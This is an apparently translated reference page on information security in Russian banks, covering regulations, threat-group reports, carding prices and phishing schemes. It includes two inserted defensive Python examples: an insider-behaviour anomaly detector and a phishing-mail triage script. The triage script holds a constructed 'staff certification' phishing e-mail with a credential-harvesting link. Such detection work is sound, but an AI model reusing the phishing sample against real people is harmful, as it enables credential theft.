
Information security in banks

Fraud on current accounts not only means that the account holder's entire overdraft limit is used up; it also often opens the door to follow-up fraud. Criminals can use the information obtained through a successful theft of your personal data for subsequent fraud with other financial products, such as consumer loans or credit cards.


Losses of banks from cyber crime

Main article: Losses of banks from cyber crime

The policy of the Central Bank in the field of data protection in banks

Main article: The policy of the Central Bank in the field of data protection in a banking system

Which information security standards apply to companies in the financial sector of the Russian Federation?

  • Bank of Russia Letter No. 49-T of March 24, 2014 "On recommendations on organizing the use of malware protection tools in banking activity"
  • Bank of Russia Regulation No. 382-P of June 9, 2012 "On requirements for ensuring information protection when making money transfers …"
  • GOST R 57580.1-2017 "Security of financial (banking) operations. Information protection of financial organizations. Basic set of organizational and technical measures"
  • Law on critical information infrastructure
  • 152-FZ "On personal data"
  • Government Decree No. 1119 "On approval of requirements for the protection of personal data during their processing in personal data information systems"
  • Bank of Russia Regulation No. 552-P of August 24, 2016 "On requirements for information protection in the payment system of the Bank of Russia"

As well as

  • FSB requirements (for holders of cryptography licenses)
  • 63-FZ "On Electronic Digital Signature"
  • Civil code
  • Criminal code
  • Code of the Russian Federation on Administrative Offences

Attack directions

Bank card fraud

ATM hacking


Unified Biometric System (UBS)

Main article: Unified Biometric System for identification

Cyber risk insurance

Main article: Cyber risk insurance

Suppliers of information security technologies for banks

In April 2019 the analytical center TAdviser issued the "Information Technologies in Banks" map, which reflects the structure of key banking business processes and marks the IT companies developing products and rendering services for the digitalization of these processes. The map covered 270 market players: 230 suppliers of IT products used for digitalization of core banking processes and 40 developers of information security solutions [1] (more detail).

The "Information Technologies in Banks" map (click to enlarge)


In Russia the hi-tech crime market in the financial sector shrank by 85%

On November 29, 2019 the international company Group-IB presented its global report on hi-tech crime, Hi-Tech Crime Trends 2019-2020. In Russia, damage from all types of cybercrime using malware aimed both at banks and at their clients fell, leading to a record 85% decline in the market. According to Group-IB's assessment, the hi-tech crime market in the Russian financial industry shrank to 510 million rubles for the period H2 2018 to H1 2019, against 3.2 billion rubles in the previous period. Against the background of the results of financially motivated groups from the "RU" zone, the decline in the number of Android trojans and of groups engaged in phishing, the volume of crime against bank clients using social engineering and telephone fraud is growing in Russia.

The Group-IB Threat Intelligence team singles out 5 groups which successfully carry out targeted attacks on banks and pose a real threat to the financial sector worldwide. Among them is the "Russian-speaking three" (Cobalt, Silence and MoneyTaker), as well as North Korean Lazarus and the SilentCards group from Kenya. So far only Cobalt, Silence and MoneyTaker have trojans that allow them to control an ATM dispenser and withdraw cash. During the studied period, only Silence attacked via ATMs; via card processing, Silence and SilentCards; via SWIFT, only Lazarus (2 successful thefts, in India and Malta, for a total of 16 million dollars).

Groups attacking banks

Only the North Korean APT group uses the FastCash theft method. It became known at the end of 2018, although it was first used in Asia in 2016. Behind all attacks of this type is the Lazarus group. Silence reduced its own phishing mailings and began buying access to target banks from other hacker groups, in particular from TA505. As of November 2019, SilentCards is the least technically prepared of the listed groups and so far carries out successful targeted attacks only on banks in Africa.

Against Russian banks, Cobalt and Silence each carried out one successful attack during the studied period, MoneyTaker two. The first two Russian-speaking groups shifted their focus to foreign targets, which led to a multiple reduction of damage "in RU". According to the Group-IB report, losses from targeted attacks on banks in Russia by financially motivated groups fell to 93 million rubles, i.e. almost 14 times. Compared with the previous period, the average theft from a targeted attack on a bank in Russia fell from 118 to 31 million rubles.

Group-IB forecasts that the "Russian-speaking three" will continue geographical expansion beyond "RU". To withdraw money they will use attacks on card processing systems and ATM trojans. SWIFT will fall into these groups' focus much less often. Lazarus will remain the only group stealing via SWIFT and ATM Switch. Successful attacks on banks will end with the IT infrastructure being taken out of operation to hide traces. SilentCards will presumably remain a local group attacking banks in its region for now.

Estimating the hi-tech crime market in Russia, Group-IB experts distinguish several segments, each of which shows a decline. Damage from thefts using PC trojans, whose "homeland" has always been Russia, fell by 89% to 62 million rubles. Russian-speaking hackers stopped creating desktop trojans. Only two groups steal money in Russia using PC trojans, Buhtrap2 and RTM, and only the latter shows activity.

Assessment of the hi-tech crime market in Russia

Trojans for mobile Android devices are disappearing more slowly, but thefts using this kind of malware are also in decline: damage in this segment was 110 million rubles, 43% lower than the same indicator in the previous period. The number of groups using Android trojans in Russia fell from 8 to 5; at the same time the "heavyweights", the trojans responsible for the largest number of fraudulent transactions, left the scene. The remaining groups abandoned the SMS channel for thefts and replaced it with the card2card transfer method, which led to an increase in the average theft from 7 to 11 thousand rubles. Overall, 22 trojans went out of use during the period, and only 7 new ones were created to replace them.

Damage from financial phishing in Russia dropped by 65% to 87 million rubles. The overall figure was affected both by a reduction in the number of active groups and by a reduction in the "average check" of an attack. Lower profitability led 15 groups earning from phishing attacks to quit; 11 remained active.

The declining cost efficiency of these attack types forces fraudsters to look for other ways of earning from bank card data. As a result, fraud using social engineering techniques took first place in terms of threat prevalence in Russia. First of all this is telephone fraud, vishing, which has literally flooded the banking market since the end of 2018. Behavioral analysis of user sessions to identify suspicious activity in remote banking (RBS) systems is still the prerogative of large banks. For this reason this type of attack on bank clients will keep its high momentum in Russia.

The carding market for the studied period grew by 33% to more than 56 billion rubles ($879,680,072). The number of compromised cards put up on underground forums increased by 38%, from 27.1 to 43.8 million, relative to the previous period. Dumps (the contents of card magnetic stripes) make up 80% of the carding market. 31.2 million dumps were found on sale in the studied period, 46% more than in 2018. Sales of text data (number, CVV, expiry date) are also rising; their growth was 19%. The average price of text data rose from $9 to $14, while the average price of a dump fell from $33 to $22.

The lowest price is usually set for compromised data of American banks: on average $8-10 for fresh text data and $16-24 for dumps. Cards of European banks are traditionally expensive: $18-21 for text data, $100-120 for a dump. Russian cards remain a rarity in large card shops, most of which do not work "on RU". Cards of Russian banks are usually in the middle price range; since the previous period the average price of a dump grew considerably, from $48 to $71 (4,500 rub), while the price of text data fell slightly, from $15 to $12 (760 rub). Meanwhile the maximum price for a dump of a Russian bank card reached $170 (10,000 rub) in 2018 and rose to $500 (32,000 rub) in 2019.

Another trend increasing the volume of bank card text data on sale was JS sniffers. This year Group-IB experts identified at least 38 different families of JS sniffers; their number is growing and already exceeds the number of banking trojans. In terms of the scale of compromises using JS sniffers, the USA takes first place and Great Britain second. This threat will be relevant first of all for countries where 3D Secure is not widespread.

Phishing remains a "long-playing" method by which fraudsters obtain users' bank card text data. Competition in this segment is growing: attackers began using management panels with web injects and auto-transfer features, which were previously the prerogative of banking trojans. Developers of phishing kits began paying more attention to self-defense: they block subnets of security vendors and hosting companies, serve phishing content only to IP addresses from the region where their victims are, redirect to legitimate websites, and check for anomalous user-agents.

New Android virus terrorizes Russian banks

At the end of November 2019 an attack by a new virus on Russian banks became known. This trojan is capable of automatically transferring funds through mobile banking applications for the Android operating system, Group-IB experts reported. Read more here.

Russian-speaking hackers stopped attacking banks in the Russian Federation and switched to foreign ones

Russian-speaking hackers stopped attacking banks in the Russian Federation and switched to foreign credit institutions. Group-IB reported this at the end of November 2019 in its Hi-Tech Crime Trends 2019 report, based on research covering the second half of 2018 and the first half of 2019.

According to the experts, until 2018 Russian-speaking hacker groups more often attacked banks in Russia and the CIS, but then this trend changed fundamentally. Cybercriminals "often start working in their own region: so it was with Cobalt and Silence in Russia and with SilentCards in Africa".

Russian-speaking hackers stopped attacking banks in the Russian Federation and switched to foreign credit institutions

"Home" regions are a test range for them: having honed their tools, they move on. For example, the same "Russian-speaking three" focused on targets in Asia, Africa, Europe and America, a Group-IB representative told RBC.

Kaspersky Lab confirmed the existence of this trend to the publication and noted that hackers are now active in less protected countries in Eastern Europe, the CIS, Asia, etc.[1]

Specialists pointed to five groups which, in their view, pose a real danger to banks: three of them (Cobalt, Silence, MoneyTaker) are classed as Russian-speaking, and two more are North Korean Lazarus and Kenyan SilentCards.

Over the 12-month studied period ending in June 2019, Cobalt and Silence each carried out only one confirmed successful attack on Russian banks and concentrated on foreign targets, which led to a multiple reduction of damage from them in the Russian sector, the report says. MoneyTaker attacked twice (in the second case the damage was prevented).

Cobalt robbed a Russian bank in September 2018; another attack was undertaken in November. In February 2019 Silence managed to steal 25 million rubles from IT Bank in Omsk, the report says.

Current problems of IT security in banks

Digital transformation improves the quality and speed of interaction between consumers of financial services and financial institutions, but at the same time it creates additional risks.

As Konstantin Markelov, Head of the R&D Department at OTR, notes, the key security risks in the credit and financial sector include:

  • financial losses of consumers of financial services, undermining confidence in modern financial technologies;
  • financial losses of individual financial institutions capable of critically affecting their financial position;
  • violation of the operational reliability and continuity of financial services, resulting in reputational damage and increased social tension;
  • development of a systemic crisis in case of information security incidents caused by cyber attacks on organizations that are significant for the financial market.

In Russia, according to FinCERT of the Bank of Russia, the volume of unauthorized transactions from accounts of legal entities at the end of 2018 was 1.469 billion rubles (in 2017 about 1.57 billion rubles, in 2016 about 1.89 billion rubles, in 2015 about 3.7 billion rubles). "A decrease is present, and that is a positive fact," Konstantin Markelov says.

In Russia and abroad, the volume of unauthorized transactions using payment cards issued by Russian credit institutions in 2018 was 1.384 billion rubles (in 2017 0.961 billion rubles, in 2016 1.08 billion rubles, in 2015 1.14 billion rubles). "Here a multidirectional trend is noticeable, and that is bad," the OTR expert adds.

According to him, as digital transformation qualitatively changes the technologies for providing financial services, the Bank of Russia at the regulatory level (and each bank at the level of internal regulations and security policies) should formulate new approaches to information security and cyber resilience of the financial system, taking into account the following factors:

  • changes in the architecture of information systems (including the use of distributed ledger technologies);
  • the possibility of remote access to financial services and the universal use of mobile technologies;
  • the use of new promising technologies for information security and cyber resilience (Big Data, artificial intelligence, robotization);
  • the Internet of Things as an element of the payment space.

Speaking about IT security problems of banks, domestic experts most often mention tasks such as data protection, fighting fraud and countering targeted attacks.

Ensuring data security

More and more systems collect large amounts of data, and data is also becoming more valuable. Therefore the problem of securing work with data gains importance, but not at the expense of the ability to process it.

As Mikhail Komarov, Informatica practice director at DIS Group, notes, data used to be protected by substantially restricting access to it. Now that is impossible: such restriction slows business development. Therefore auditing of access to and use of data by employees in the organization will intensify. Besides, demand will grow for intelligent data depersonalization solutions which, on the one hand, protect data and, on the other, preserve its features and the ability to process it.


It is important to note that these will be tools both for depersonalization of data in non-production environments and for real-time depersonalization in production systems, Komarov says.


According to Dmitry Pudov, deputy CEO for technologies and development at Angara Technologies Group, the relevance of data protection questions is connected with the implementation of a large number of projects transforming the bank's IT landscape: implementation of Big Data analysis systems, robo-advising, and projects on personalization of offers (connected with ML and social mining).


Taking into account the transformation of the approaches used and the focus on the speed of delivery of new systems and products, cybersecurity risks in development increase significantly. This, in turn, forces banks to actively consider methods and solutions that allow a reasonable compromise between cybersecurity risks and the speed of developing and releasing new services to the market. Recently we have noted interest from banks in the following classes of solutions: privileged user control, containerization security, Big Data security, and analysis and security of open source software, he says.


Internal fraud

Sergey Kosetsky, commercial director of X-Com, believes that the information system protection of large banks is fairly strong, so the focus of threats shifts from classical cyber attacks to the human factor. Evidence of this is the series of recent high-profile scandals involving leaks of personal data of clients of top-ten banks.

Rustem Mannanov, an expert at ICL System Technologies, adds that to protect against a dishonest employee it is worth applying systems of the User Behavior Analytics class. They allow incidents to be detected and prevented at early stages. These solutions use approaches such as rule-based scenarios, predictive technologies, machine learning and anomaly detection.

Ilya Polessky, business development director at DTG (a division of Lanit group), considers the most burning issues for banks to be internal security and partner interaction that exposes data on the core business. According to him, data protection is connected not only with a set of products that were previously unavailable, but also with the abundance of systems integrated into banking activity.
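The two UBA approaches named above, rule-based scenarios and anomaly detection, can be shown on a small scale. The following is an added example written for this page, not code from ICL, DTG or any other vendor mentioned here: it runs over a constructed employee access log (the log format, the working hours, the employee names and the thresholds are all assumptions) and flags customer-record lookups outside working hours (a rule) and a day whose lookup count is far above the employee's own baseline (a leave-one-out z-score).

```python
"""Toy User Behavior Analytics over a constructed employee access log.

Added example for illustration; not code from the page or from any vendor.
Log format: "<iso-timestamp> <employee> <action> <customer_id>" (assumption).
"""
from collections import defaultdict
from datetime import datetime, timedelta
from statistics import mean, pstdev

WORK_HOURS = range(9, 19)  # 09:00-18:59; assumed working hours for the example


def build_sample_log():
    """Constructed sample. ivanov does 2-3 lookups a day, then 40 on Nov 8
    (a bulk-export pattern). petrov does 3 a day, plus one lookup at 23:40."""
    lines = []
    for day, n in [(4, 2), (5, 3), (6, 2), (7, 3), (8, 40)]:
        for i in range(n):
            ts = datetime(2019, 11, day, 10, 0) + timedelta(minutes=i)
            lines.append(f"{ts.isoformat()} ivanov view_customer C{1000 + i}")
    for day in range(4, 9):
        for i in range(3):
            ts = datetime(2019, 11, day, 14, 0) + timedelta(minutes=i)
            lines.append(f"{ts.isoformat()} petrov view_customer C{2000 + i}")
    lines.append("2019-11-06T23:40:00 petrov view_customer C2099")
    return "\n".join(lines)


def parse_log(text):
    """Parse log lines into (timestamp, employee, action, customer_id) tuples."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, user, action, cid = line.split()
        events.append((datetime.fromisoformat(ts), user, action, cid))
    return events


def off_hours_alerts(events):
    """Rule-based scenario: any customer lookup outside WORK_HOURS."""
    return [(user, ts.isoformat(), cid)
            for ts, user, action, cid in events
            if action == "view_customer" and ts.hour not in WORK_HOURS]


def daily_counts(events):
    """Number of customer lookups per employee per calendar day."""
    counts = defaultdict(lambda: defaultdict(int))
    for ts, user, action, _ in events:
        if action == "view_customer":
            counts[user][ts.date()] += 1
    return counts


def volume_anomalies(events, z_threshold=3.0, min_days=3, min_jump=5):
    """Anomaly detection: flag (employee, day) when the day's lookup count
    exceeds the employee's own baseline (all other days) by more than
    z_threshold standard deviations. A perfectly flat baseline has zero
    deviation, so then any count more than min_jump above the mean is flagged."""
    alerts = []
    for user, per_day in daily_counts(events).items():
        for day, count in sorted(per_day.items()):
            others = [c for d, c in per_day.items() if d != day]
            if len(others) < min_days:
                continue  # not enough history to build a baseline
            base, spread = mean(others), pstdev(others)
            if spread == 0:
                suspicious = count > base + min_jump
            else:
                suspicious = (count - base) / spread > z_threshold
            if suspicious:
                alerts.append((user, day.isoformat(), count, round(base, 1)))
    return alerts


if __name__ == "__main__":
    evts = parse_log(build_sample_log())
    for alert in off_hours_alerts(evts):
        print("off-hours lookup:", alert)
    for alert in volume_anomalies(evts):
        print("volume anomaly (user, day, count, baseline):", alert)
```

The leave-one-out baseline matters: if the anomalous day were included in its own baseline, the 40-lookup day would inflate the standard deviation and mask itself. In a real deployment the baseline would be built per role as well as per employee, and both signals would feed a SOC queue rather than block the employee outright.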


The notorious human factor is what has to be faced at all interaction layers of a financial institution, he notes.


External fraud

With permission granted to use citizens' biometrics for identification and remote provision of banking services, new types of fraud have also appeared. For example, attackers try to take control of a client's "voice profile" by recording phrases and commands in order to pass identification and gain access to transactions with funds. Two-factor authentication via phone also gives fraudsters room for activity: the bank client's SIM card or gadget makes it possible to take control of the client's accounts as well.

Among the main threats one can also single out fraud using social engineering. Cases of fraud, both by telephone and via phishing, are becoming more frequent. These are attempts to illegally obtain from bank clients information about their payment cards.


Solving the described problems requires implementing a wide variety of solutions, from data masking to various organizational measures, notes Maxim Tikurkin, CEO of System Software.


According to Maria Bar-Biryukova, deputy CEO of Corus Consulting Group, to fight these threats it is necessary to keep a balance between security and convenience: use automatic monitoring and situational centers, and conduct proactive work with users and clients.

Countering targeted attacks

Over the last several years, countering targeted attacks has remained the most pressing problem. In the event of a successful attack, losses can be measured in tens or even hundreds of millions of rubles, so banks actively invest in modern tools for detecting attacks at early stages.


Practically all solutions lead to growth in information security operating costs, since tools for detecting signs of cyber attacks require subsequent operational analysis by specialists. This also explains the keen interest and investment of banks in creating and developing Security Operations Centers (SOC), which answer the growing requirements of banks for the operational efficiency of their cybersecurity divisions, says Dmitry Pudov, deputy CEO for technologies and development at Angara Technologies Group.


According to Pyotr Filatov, commercial director of Oberon, the principle for choosing a "victim" bank is simple: the bigger the business, the more attention it attracts and the more serious the potential losses. For example, user data leaks cost a large bank many times more, both in money and in reputation: according to Sberbank, losses from cyber attacks in our country amount to about 650 billion rubles annually, while the number of incidents continues to grow.

Inspections by the Central Bank of the Russian Federation show that no bank in Russia fully meets its information security requirements. In 2018 the Central Bank published a standard that regulates the interaction of banks with FinCERT. Research shows that only 25% of banks in Russia use digital innovations together with cybersecurity tools; 44% of banks limit themselves to infrastructure protection tools.


Participation in initiatives such as the faster payments system and the "digital profile of the citizen", as well as the creation of partner ecosystems based on OpenAPI, demands new approaches to cybersecurity from banks. It is expected that in the coming years encryption, blockchain, machine learning and analytics will be used to improve information security measures. As a result, more than 50% of security alerts will be processed automatically and in real time on the basis of artificial intelligence. Looking a little further into the future, behavioral biometrics and quantum encryption technologies will be used for cybersecurity, says Alexander Rozhkov, sales director of the services division at Softline Group.


A new method of stealing bank client data appeared in Russia

At the beginning of November 2019 a new method of stealing bank client data became known in Russia. Attackers developed a corporate phishing scheme that imitates the testing of credit institution staff.

According to Izvestia, citing Kaspersky Lab, bank employees receive an e-mail with an "invitation" to undergo certification. After following the link, they are asked to enter the login and password of their work e-mail, so that cybercriminals gain access to correspondence, which may contain files with personal data of bank clients.

A new method of stealing bank client data became known in Russia.

Tatyana Scherbakova, senior content analyst at Kaspersky Lab, says that the scale of an attack under this scheme depends on the contents of the compromised mailbox. The first thing fraudsters get access to is corporate correspondence. And if logins and passwords for databases with personal information about clients, or the databases themselves, are sent in plaintext, the attackers will get those too.

Scherbakova added that Kaspersky Lab learned about the new phishing method from its clients.

The Central Bank's cybersecurity division notes that phishing is the leading factor contributing to successful attacks on banks aimed at taking control of the personal data of residents of the country. Fraudsters often exploit the human factor when mailing letters to bank employees.

Credit institutions explained to the newspaper that banks quite often conduct training and certifications, so such letters do not arouse suspicion among employees. Moreover, banks are, as a rule, highly formalized organizations, so communication via e-mail is usual for employees.[2]
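The scheme described above (a "certification" invitation whose link leads to a login page on a foreign host) is exactly what a mail-gateway triage rule can catch before the message reaches an inbox. The following is an added example written for this page, not code from Kaspersky Lab or from the page itself: it parses a constructed raw message with the standard library, checks that the sender domain and every link host belong to the corporate domain, and flags a link whose visible text shows one host while the href points to another. The corporate domain, the message and the finding codes are assumptions.

```python
"""Triage of a constructed "staff certification" phishing e-mail.

Added example; not code from the page or from any vendor mentioned on it.
Checks: sender domain, link host, visible-text/href mismatch, and a login
path on an external host. CORPORATE_DOMAIN and the message are assumptions.
"""
import email
from email import policy
from html.parser import HTMLParser
from urllib.parse import urlparse

CORPORATE_DOMAIN = "examplebank.test"  # assumption for the example

# Constructed sample: lookalike sender ("examp1ebank"), link whose host only
# *starts* with the corporate domain, and visible text showing a different URL.
RAW_MESSAGE = b"""\
From: HR Department <hr@examp1ebank.test>
To: employee@examplebank.test
Subject: Mandatory staff certification
Content-Type: text/html; charset="utf-8"

<html><body>
<p>Dear colleague, you are invited to pass the annual certification.</p>
<p><a href="http://examplebank.test.certification-portal.example/login">
https://portal.examplebank.test/certification</a></p>
</body></html>
"""


class LinkExtractor(HTMLParser):
    """Collect (href, visible text) pairs for every <a> element."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href")
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def is_corporate(host):
    """True only for the corporate domain itself or a subdomain of it.
    A suffix check defeats hosts like 'examplebank.test.attacker.example'."""
    host = (host or "").lower()
    return host == CORPORATE_DOMAIN or host.endswith("." + CORPORATE_DOMAIN)


def triage(raw_bytes):
    """Return a list of (code, detail) findings for one raw RFC 5322 message."""
    msg = email.message_from_bytes(raw_bytes, policy=policy.default)
    findings = []

    sender_domain = msg["From"].addresses[0].domain
    if not is_corporate(sender_domain):
        findings.append(("SENDER_DOMAIN", sender_domain))

    body = msg.get_body(preferencelist=("html",))
    if body is None:
        return findings
    extractor = LinkExtractor()
    extractor.feed(body.get_content())

    for href, text in extractor.links:
        target = urlparse(href)
        if not is_corporate(target.hostname):
            findings.append(("EXTERNAL_LINK", href))
            if "login" in target.path.lower() or "auth" in target.path.lower():
                findings.append(("CREDENTIAL_PROMPT", href))
        if text.lower().startswith(("http://", "https://")):
            shown = urlparse(text).hostname
            if shown != target.hostname:
                findings.append(("TEXT_HREF_MISMATCH", f"{shown} -> {target.hostname}"))
    return findings


if __name__ == "__main__":
    for code, detail in triage(RAW_MESSAGE):
        print(f"{code}: {detail}")
```

The suffix check in `is_corporate` is the detail most often got wrong: a naive `CORPORATE_DOMAIN in host` test would accept the sample link, because the attacker-controlled host begins with the bank's domain. Findings of this shape are what a gateway would attach to the message before quarantining it or marking it as external.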

Positive Technologies: techniques of APT groups in attacks on credit and financial organizations

On October 10, 2019 Positive Technologies reported that its experts had analyzed the tactics and techniques of ten APT groups that attacked financial companies over the last two years[3] and found that each of them resorts to phishing, and that when searching for banking systems in the network, criminals use legitimate administration utilities and compromised credentials. Read more here.

The Geost banking botnet infected 800 thousand Android devices in the Russian Federation

On October 3, 2019 it became known that researchers from the Czech Technical University, the National University of Cuyo (Argentina) and Avast had detected a banking botnet named Geost. The victims of the malicious campaign were at least 800 thousand owners of Android devices in the Russian Federation; in particular, attackers got access to their bank accounts, which in total held several million euros. Read more here.

Central Bank: the number of fraudulent calls with spoofed bank numbers is growing sharply

On September 27, 2019 it became known that fraudulent calls with spoofed bank phone numbers had become more frequent in Russia. According to the Central Bank, in June-August alone fraudsters managed to spoof about 200 bank numbers.

According to Kommersant, in the summer of 2019 the Central Bank sent telecom operators information about more than 2.5 thousand numbers from which calls to Russian clients had come. At the regulator's request, operators blocked the number in 218 cases, introduced restrictions on the use of financial services in 59, and detected substitution of a bank number in 198. However, in more than two thousand cases no measures were taken due to the lack of a legal basis.

Fraudsters began calling Russians with spoofed bank numbers more often

By mid-summer the share of calls with spoofed bank numbers reached 35% of the total number of fraudulent calls, said Ilya Suloyev, deputy director of the information security department of Otkrytiye Bank. Rosbank faced a wave of calls from fraudsters at the beginning of July. Alfa-Bank also recorded number spoofing.

A new surge in fraudulent calls was recorded in September 2019, Artem Sychev, first deputy head of the information security department of the Bank of Russia, told the publication. According to him, implementing technical protection measures will also require legislative amendments.

Many of the Central Bank's requests received in the summer "were technically incorrect", a VimpelCom representative explained to the publication. According to him, the lists of numbers submitted for blocking sometimes included numbers that banks use for outgoing calls to clients. Blocking such numbers would mean banks could not call their clients, the operator noted.

The Central Bank's statistics reflect only a small part of the problem, MegaFon commercial director Vlad Wolfson told the publication.[4]

Trend Micro: security in banking sector in the conditions of PSD2

On September 24, 2019 the Trend Micro company provided a research about a status of bank security within the payment directive of European Parliament and European Commission, PSD2. In the research The Risks of Open Banking — Are Banks and their Customers Ready for PSD2? it is told about risks which financial structures should face, and about possible methods of the cybercriminals wishing to use vulnerabilities of the Open Banking system.

Upgraded version of the payment directive of the European union of PSD2 which is also called by Open Banking took effect on September 14, 2019. Providing services of banks of additional opportunities to users and bigger control over the banking data became purpose PSD2. Also the directive gives to the third-party companies which specialize in financial technologies and provide the services to banks and clients, data access of users, equivalent with banks, for their analysis and providing financial recommendations.

In PSD2 which will replace the first version of the directive approved in 2007 specific procedures of data protection, the right and obligation of providers of services and users are more accurately described, and the purpose of the updated directive is stimulation of innovations and the competition in the financial sphere. And though it is developed first of all for EU member states, action and effects of acceptance of PSD2 will extend far for a framework of the European Union. The directive is considered an important step for all industry as it selects full control over client data at banks and grants to users the right to share this information with other financial services providers.

For observance of requirements of PSD2 in the field of security jars are opened by the API to the financial technical-companies (when in these companies necessary infrastructure for data security provision is created and clients agree to transfer of these data). But there is a number of concerns concerning real readiness of banking sector and the financial technical-companies for work in the conditions of PSD2.

Clients who decided to use applications of the Open Banking system for storage of the financial data and management of them enter absolutely new trusted relationships: earlier they disclosed this information to organizations with long-term history and the settled reputation, and now data will be transferred to much less known third-party service providers who have no such experience of fight against fraud. At the same time the systems of protection of banks will begin to obtain less data for training and identification of cases of fraud in real time as financial information of their clients will begin "be sprayed" on several organizations.

In spite of the fact that clients will be better informed on a phishing and methods which are used by cybercriminals for obtaining their data, malefactors will have new opportunities for deception — for example, criminals can call themselves representatives of the financial technical-companies working with banks. Also adoption of the directive for certain will lead to emergence of new phishing schemes.

Banks were more than once noticed in disclosure of personal data of their clients which contained in open form their systems and API in URL. At the same time some financial technical-companies use obviously insufficient security measures and risky methods of data collection, for example, of screen scraping (collecting and the analysis of screen data). Therefore it is very possible that cybercriminals will be able to find vulnerable applications and functions which will try to use right after start of a system.

Information on bank transactions is extremely valuable to attackers: it helps reveal users' behavioural patterns, habits, schedule and financial status. Advertising agencies engaged in spam and promotion of questionable content, as well as some public institutions connected, for example, with security or intelligence, will therefore be willing to pay for access to such data.

In its first year the cyberthreat data exchange platform helped banks prevent 8 billion rubles of damage

On August 29, 2019 BI.ZONE, together with the Banking Association of Russia, summed up the first year of operation of its cyberthreat data exchange platform, which by then had about 70 participating financial institutions. In its first year the platform helped banks prevent damage of 8 billion rubles. Read more here.

The Amavaldo banking trojan uses screenshots to steal information

On August 8, 2019 the international anti-virus company ESET reported that it had studied a number of banking trojans that attack users in Latin America. Read more here.

Check Point: the number of attacks on mobile banking doubled in the first half of the year

On August 1, 2019 Check Point Software Technologies published its Cyber Attack Trends: 2019 Mid-Year Report. Hackers continue to develop new toolkits and techniques aimed at corporate data stored in cloud infrastructure, personal mobile devices, various applications and even popular mail platforms. The researchers note that no sector is fully protected from cyberattacks. Read more here.

German banks drop support for one-time SMS code authorization

In July 2019 several German banks announced plans to stop using one-time SMS passwords as a method of authorization and transaction confirmation. The reason is the new EU legislation that comes into full force on September 14, 2019 [5].

Handelsblatt reports that Postbank will drop support for one-time SMS passwords in August, Raiffeisen Bank and Volksbank AG in the fall, and Consorsbank by the end of 2019. Deutsche Bank and Commerzbank also intend to drop support but have not yet announced dates. Other banks, such as DKB and N26, never used this technology, and ING has not yet made public statements about its plans.

In 2015 the EU revised its first payment services directive of 2007 (the set of rules governing online payments in the EU) and released the updated PSD2, which requires the implementation of strong customer authentication mechanisms.

Over the last few years the number of attacks using SIM swapping has increased; with this method a fraudster deceives the telecom operator into transferring the user's phone number to another SIM card, thereby gaining access to the user's online accounts at banks and cryptocurrency exchanges.

Cybersecurity specialists have warned against one-time SMS passwords for several years, and not only because of SIM swapping attacks. The problem lies in the inherent, uncorrectable shortcomings of the SS7 (OKS-7) protocol used to set up most telephone exchanges worldwide. Vulnerabilities in this protocol allow attackers to quietly hijack a user's phone number, even without the provider's knowledge, which lets them track its owner and authorize online payments or login requests.

Cybersecurity experts recommend using authenticator applications or hardware tokens instead of SMS-based authentication.

97% of large banks are vulnerable to cyberattacks

On July 10, 2019 it became known that only three banks out of a hundred received the highest mark for website security and SSL encryption implementation.

The vast majority of the large financial institutions in the S&P Global rating are vulnerable to hacker attacks. Specialists of the Swiss company ImmuniWeb reached this conclusion after a large-scale study in which 100 websites belonging to large banks, 2,336 subdomains, 102 Internet banking applications, 55 mobile banking applications and 298 mobile banking APIs were examined.

The specialists analyzed a number of criteria, including security measures, compliance with the EU General Data Protection Regulation (GDPR), compliance with PCI DSS, use of outdated and vulnerable software, SSL/TLS encryption implementation and so on.

Vulnerabilities or misconfigurations were detected on the websites of 31% of banks; 5% of the websites contained exploitable known vulnerabilities, and 13% of resources either had no encryption or had exploitable vulnerabilities. Only 4% of the websites showed no problems at all.

According to the specialists, 40% of Internet banking applications are affected by vulnerabilities or misconfigurations, 7% contained known vulnerabilities, and 2% of applications had no encryption. Only 15% of the applications studied were safe.

As for PCI DSS compliance, 62% of the websites and 58% of the Internet banking applications showed good results, while 38% of the websites and 49% of the applications failed the tests. GDPR compliance is much worse: only 39% of the websites and 17% of the Internet banking applications meet the regulation's requirements.

The study also showed that 29% of the websites contain at least one known and unpatched vulnerability of medium or high severity. The most widespread were XSS vulnerabilities, as well as problems related to the risk of data disclosure and incorrect settings.

55% of the mobile banking applications studied contained vulnerabilities exposing confidential banking data; 100% of the solutions had at least one minor vulnerability, 92% at least one medium-severity vulnerability, and 20% of applications at least one serious vulnerability [6].

Sberbank, VTB, Unicredit and Otkrytiye prohibited employees from photographing PC screens

On June 24, 2019 it became known that large Russian banks had prohibited employees from photographing computer screens with personal mobile phones.

According to RBC, the restrictions were introduced at Sberbank, Unicredit, Otkrytiye bank and VTB. Otkrytiye bank prohibits employees from photographing or filming monitor screens, internal documents, presentations and client data, and from making audio recordings of office meetings. At VTB, photography on bank premises is allowed only in coordination with the responsible divisions.

The prohibition is explained by the fact that employees quite often photograph clients' personal data in order to sell it on the black market, where it is in demand from fraudsters. According to the publication, the price of personal data can range from 800 to 8,000 rubles.

Sergey Nikitin, deputy head of the Group-IB computer forensics laboratory, explained that fraudsters post requests on the darknet to find out a victim's card balance, passport data and other details.

According to the expert, the prevalence of screen photography can be explained by the fact that companies have begun to deploy systems protecting against insider threats and leaks, so employees simply photograph the screen instead. Proving the fact of photography is very hard.

Sberbank deputy chairman Stanislav Kuznetsov said that the bank's systems, as a rule, do not allow service data to be transferred to a third party; otherwise the case is handed to the police.

Vladimir Zhuravlev, director of the information security department at FC Otkritie, says that banking data can be used in fraudulent schemes based on social engineering. Violation of the prohibition carries tough sanctions, up to dismissal, he reported. [7]

A Krasnoyarsk Krai resident stole funds from other people's accounts using malware

In May 2019 it became known that officers of Department "K" of the Ministry of Internal Affairs in the Chuvash Republic had identified a cybercriminal who was stealing money from other people's bank accounts using malware. The suspect is a 31-year-old resident of Krasnoyarsk Krai who had previously been prosecuted.

